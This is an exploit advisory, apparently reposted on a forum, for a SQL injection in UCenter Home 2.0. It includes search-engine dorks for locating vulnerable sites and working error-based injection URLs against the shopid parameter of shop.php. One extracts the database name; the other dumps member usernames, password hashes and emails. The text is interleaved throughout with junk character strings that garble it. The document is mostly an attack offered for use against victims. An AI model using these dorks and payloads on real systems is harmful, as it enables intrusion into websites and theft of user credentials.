% n5 x) {9 S8 M9 R
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
# f$ p; u' P9 r2 F! W' ? O8 Q9 A( ?% `; R
- v. ]& }, G$ r, G0 ~0 l9 K2 u4 u- J/ C% U7 Q$ ~6 U% A8 o x
*/ Author : KnocKout
6 b+ ^6 W7 o$ M
6 o. k, d! [3 w. h*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
# G/ G/ _. q& b- D2 P* h* H
9 A \9 B* `* |0 i*/ Contact: knockoutr@msn.com / U/ ]0 L' u! E& q$ U2 I* J
$ i& r$ S# I1 ]+ W. E
*/ Cyber-Warrior.org/CWKnocKout
6 F! X- E( D$ \, h6 d. O ]! w' ~/ ?: B. S& ~/ v- Y7 X3 d" w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== L6 G' K0 {% n/ W8 [
( e7 ?: e. ~0 N xScript : UCenter Home 1 p+ X) v# M. _6 G0 {
9 K$ E2 ?! X6 W2 v0 k
Version : 2.0 9 ^$ \) l! O7 e! g
& J- e9 U: a# [# l! `Script HomePage : http://u.discuz.net/
; W! O# O; l: D* [, p% j& ]
) V; C0 b& D6 J% N! w. D$ M( @__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ A; F# V4 F) t+ ^+ s4 _. U) S& Z& p3 `! E3 Z- A5 j! |5 b
Dork : Powered by UCenter inurl:shop.php?ac=view
& \! X& k6 R3 j
6 N2 P3 X& S0 D& }& {# eDork 2 : inurl:shop.php?ac=view&shopid= $ g+ }; W5 j% I6 ]' j+ \- P
/ C h0 o9 v$ a' l* [9 }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 ? N0 D4 q! d3 v: _. ?8 W7 f5 p ?, o4 |
Vuln file : Shop.php 0 u- g c9 T" f; |$ ~- l/ O6 O
% N" G# U4 Z. p7 D6 H
value's : (?)ac=view&shopid= * m8 S. P$ [' T) L& G8 o {
& N& {( ?- S7 a7 o& P$ n6 jVulnerable Style : SQL Injection (MySQL Error Based) + ?, U5 Z8 z r* R8 V; F
! q9 _8 v5 E( U) f
Need Metarials : Hex Conversion
* v Y: t# ?2 i" x* ]* m5 z" i: I$ X1 B+ L* r6 z- Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 C% O. B/ [ Z$ C9 u
: h6 E. v1 D% x3 Q, Q b6 QYour Need victim Database name. * D! X( F& \. g- s. [! ^
5 C$ z6 D L: X" xfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 i$ r& @6 G5 d
1 O4 E+ w9 }8 m' p. i- N
.. 7 G1 }) r b% C, L
& F6 S( z8 P( R
DB : Okey.
1 a) t0 }) D- I1 a1 @. @% j, |, S0 h( ?' Y4 m4 f+ {1 Y$ X& b- T7 C
your edit DB `[TARGET DB NAME]` 7 y1 O: f& O8 c: R/ z, o* ]: z
; c A5 Y& [( `, h" w- e' o6 Z' JExample : 'hiwir1_ucenter' 6 n' K$ W: g" r' H8 |
3 p$ f& \3 @$ x5 M0 t* B& }
Edit : Okey. \4 Q3 [8 m v b9 }4 u
( m9 b9 g8 O9 C, Y1 m
Your use Hex conversion. And edit Your SQL Injection Exploit..
" f2 i( a; ]" x: @! }4 w8 J/ p9 Q, o: W
) Y9 q& I' M) p8 G* w
& N0 V! I9 P" N! ]+ m
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 M4 K0 U0 s! L1 ~) {) S8 I4 O+ Q, l
|
发表于 2013-2-27 21:31:31
收藏
支持
反对